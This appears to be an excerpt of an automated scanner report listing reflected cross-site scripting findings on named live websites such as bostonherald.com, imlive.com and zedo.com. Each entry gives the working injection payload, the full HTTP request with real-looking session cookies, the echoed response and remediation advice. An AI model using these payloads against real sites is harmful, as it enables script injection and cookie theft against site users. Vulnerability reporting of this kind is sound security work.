Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/document.bg?f=misc/100216housing.pdf8fee9"%3balert(1)//3539e9e682&h=Massachusetts%20Housing%20Partnership&k=bh HTTP/1.1 Host: bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:52 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 28007
var iframe_container_div = $("iframe_wrapper"); var iframe_pdf_source = "http://multimedia.bostonherald.com/misc/100216housing.pdf8fee9";alert(1)//3539e9e682";
The value of the h request parameter is copied into the HTML document as plain text between tags. The payload ef2a2<script>alert(1)</script>16a85c5a392 was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/document.bg?f=misc/100216housing.pdf&h=Massachusetts%20Housing%20Partnershipef2a2<script>alert(1)</script>16a85c5a392&k=bh HTTP/1.1 Host: bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:22:24 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 28035
The value of the topic request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c37a"><script>alert(1)</script>110b65414ac was submitted in the topic parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/?topic=Annette+Bening5c37a"><script>alert(1)</script>110b65414ac&position=0 HTTP/1.1 Host: bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:57 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 32127
The value of the topic request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e99ef</script><script>alert(1)</script>6ffe388eb75 was submitted in the topic parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/?topic=Annette+Beninge99ef</script><script>alert(1)</script>6ffe388eb75&position=0 HTTP/1.1 Host: bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:22:15 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 32149
The value of the format request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6964e'-alert(1)-'6dd42dc7131 was submitted in the format parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /track/inside_track/view.bg?articleid=1312557&format=comments6964e'-alert(1)-'6dd42dc7131&srvc=track&position=2 HTTP/1.1 Host: bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:23:21 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-language: en Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 44200
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
// Converts the GET params to a JSON object GET_Params = 'articleid=1312557&format=comments6964e'-alert(1)-'6dd42dc7131&srvc=track&position=2'.toQueryParams();
//alert(Object.inspect(GET_Params)); //----------------------------------------------------------------- function updatePage(key,val) { //------ ...[SNIP]...
The value of the format request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4303'-alert(1)-'7c0f4b2ce6d was submitted in the format parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /track/star_tracks/view.bg?articleid=1312549&format=commentsc4303'-alert(1)-'7c0f4b2ce6d&srvc=track&position=3 HTTP/1.1 Host: bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:23:28 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-language: en Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 38967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
// Converts the GET params to a JSON object GET_Params = 'articleid=1312549&format=commentsc4303'-alert(1)-'7c0f4b2ce6d&srvc=track&position=3'.toQueryParams();
//alert(Object.inspect(GET_Params)); //----------------------------------------------------------------- function updatePage(key,val) { //------ ...[SNIP]...
4.221. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://br.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34723"><a>3f71d325883 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?34723"><a>3f71d325883=1 HTTP/1.1 Host: br.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||34723"><a>3f71d325883~1');return false;"> ...[SNIP]...
4.222. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://br.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a910'-alert(1)-'8200d22e901 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?3a910'-alert(1)-'8200d22e901=1 HTTP/1.1 Host: br.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=br.imlive.com&ul=/?3a910'-alert(1)-'8200d22e901=1&qs=3a910'-alert(1)-'8200d22e901=1&qs=3a910'-alert(1)-'8200d22e901=1&iy=dallas&id=44&iu=1&vd=b00d0ff4-12cf-4179-8b1b-240f4a4d01b6';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
4.223. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://br.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6051e"><script>alert(1)</script>af1af9033d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?6051e"><script>alert(1)</script>af1af9033d9=1 HTTP/1.1 Host: br.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/ X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 16:44:58 GMT Connection: close Content-Length: 21217
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/?6051e"><script>alert(1)</script>af1af9033d9=1');return false;"> ...[SNIP]...
The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6113a"><script>alert(1)</script>fb907eb99cc was submitted in the cbname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=6113a"><script>alert(1)</script>fb907eb99cc&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: br.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d687a"><script>alert(1)</script>9d2e569021a was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=d687a"><script>alert(1)</script>9d2e569021a&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: br.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 661d9'style%3d'x%3aexpression(alert(1))'99e183046e6 was submitted in the gotopage parameter. This input was echoed as 661d9'style='x:expression(alert(1))'99e183046e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=661d9'style%3d'x%3aexpression(alert(1))'99e183046e6 HTTP/1.1 Host: br.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:02 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: ibr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSQSSRDRC=BDNHCJMAKNOJHLDBKMBBNOGJ; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:02 GMT Connection: close Content-Length: 8329 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfad6"><script>alert(1)</script>6b350e8e83c was submitted in the promocode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583cfad6"><script>alert(1)</script>6b350e8e83c&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: br.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;
The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload 5b13c<script>alert(1)</script>3acf57ed041 was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
POST /services/messagebroker/amf?playerKey=AQ%2E%2E,AAAAE6Rs9lk%2E,SN2uQ1cpwui9Aq_exhx7aflP2FnHceiC HTTP/1.1 Host: c.brightcove.com Proxy-Connection: keep-alive Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=370&height=300&flashID=myExperience766783859001&bgcolor=%23FFFFFF&wmode=transparent&isVid=true&dynamicStreaming=true&playerID=657985641001&playerKey=AQ%252E%252E%2CAAAAE6Rs9lk%252E%2CSN2uQ1cpwui9Aq_exhx7aflP2FnHceiC&%40videoPlayer=766783859001&autoStart= content-type: application/x-amf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 748
The value of the partnerId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85054'%3balert(1)//7c6ede70f9f was submitted in the partnerId parameter. This input was echoed as 85054';alert(1)//7c6ede70f9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /collector/tag.js?_r=1296236606219&partnerId=oversee85054'%3balert(1)//7c6ede70f9f&siteID=NpAF2Tti8P0PKjSDdT3nmi2mz&logSearch=true&referrerURL=http%3A%2F%2Feztext.com%2F&q=mass%20texting HTTP/1.1 Host: c.chango.com Proxy-Connection: keep-alive Referer: http://searchportal.information.com/?o_id=131972&domainname=eztext.com&popunder=off&exit=off&adultfiler=off Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:50 GMT Content-Type: text/javascript Connection: close Server: TornadoServer/1.1 Etag: "566609a3d6eaa799dec1a9fc9ae77e4273324fd9" Pragma: no-cache Cache-Control: no-cache, no-store, max-age=0, must-revalidate P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _t=2d1cbd00-2b4b-11e0-9a94-00259009a9c2; Domain=chango.com; expires=Tue, 26 Jan 2021 01:57:50 GMT; Path=/ Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Fri, 29 Apr 2011 01:57:50 GMT; Path=/ Content-Length: 1331
The value of the referrerURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 543f3"%3balert(1)//6db19040e31 was submitted in the referrerURL parameter. This input was echoed as 543f3";alert(1)//6db19040e31 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /collector/tag.js?_r=1296236606219&partnerId=oversee&siteID=NpAF2Tti8P0PKjSDdT3nmi2mz&logSearch=true&referrerURL=http%3A%2F%2Feztext.com%2F543f3"%3balert(1)//6db19040e31&q=mass%20texting HTTP/1.1 Host: c.chango.com Proxy-Connection: keep-alive Referer: http://searchportal.information.com/?o_id=131972&domainname=eztext.com&popunder=off&exit=off&adultfiler=off Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:50 GMT Content-Type: text/javascript Connection: close Server: TornadoServer/1.1 Etag: "1374605d644743af6028f557ff6b098ab9a18c9d" Pragma: no-cache Cache-Control: no-cache, no-store, max-age=0, must-revalidate P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _t=2d47aca4-2b4b-11e0-abf9-00259009a9e4; Domain=chango.com; expires=Tue, 26 Jan 2021 01:57:50 GMT; Path=/ Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Fri, 29 Apr 2011 01:57:50 GMT; Path=/ Content-Length: 1331
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46055'%3balert(1)//5d9eeeeb662 was submitted in the $ parameter. This input was echoed as 46055';alert(1)//5d9eeeeb662 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1220:46055';alert(1)//5d9eeeeb662;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "419234-82a5-4988a5a7ea280" Vary: Accept-Encoding X-Varnish: 1882666994 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=43 Expires: Fri, 28 Jan 2011 16:41:50 GMT Date: Fri, 28 Jan 2011 16:41:07 GMT Connection: close Content-Length: 1934
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=126;var zzPat=',46055';alert(1)//5d9eeeeb662';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,46055';alert(1)//5d9eeeeb662;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7dc14"%3balert(1)//8701fee00ba was submitted in the $ parameter. This input was echoed as 7dc14";alert(1)//8701fee00ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=7dc14"%3balert(1)//8701fee00ba&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1220:7dc14";alert(1)//8701fee00ba;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=33 Expires: Fri, 28 Jan 2011 16:41:50 GMT Date: Fri, 28 Jan 2011 16:41:17 GMT Connection: close Content-Length: 1931
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=69;var zzPat=',7dc14";alert(1)//8701fee00ba';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,7dc14";alert(1)//8701fee00ba;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b870"%3balert(1)//b6e0807d8e was submitted in the $ parameter. This input was echoed as 5b870";alert(1)//b6e0807d8e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1220:5b870";alert(1)//b6e0807d8e;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "419234-82a5-4988a5a7ea280" Vary: Accept-Encoding X-Varnish: 1882666994 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=43 Expires: Fri, 28 Jan 2011 16:41:50 GMT Date: Fri, 28 Jan 2011 16:41:07 GMT Connection: close Content-Length: 1932
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
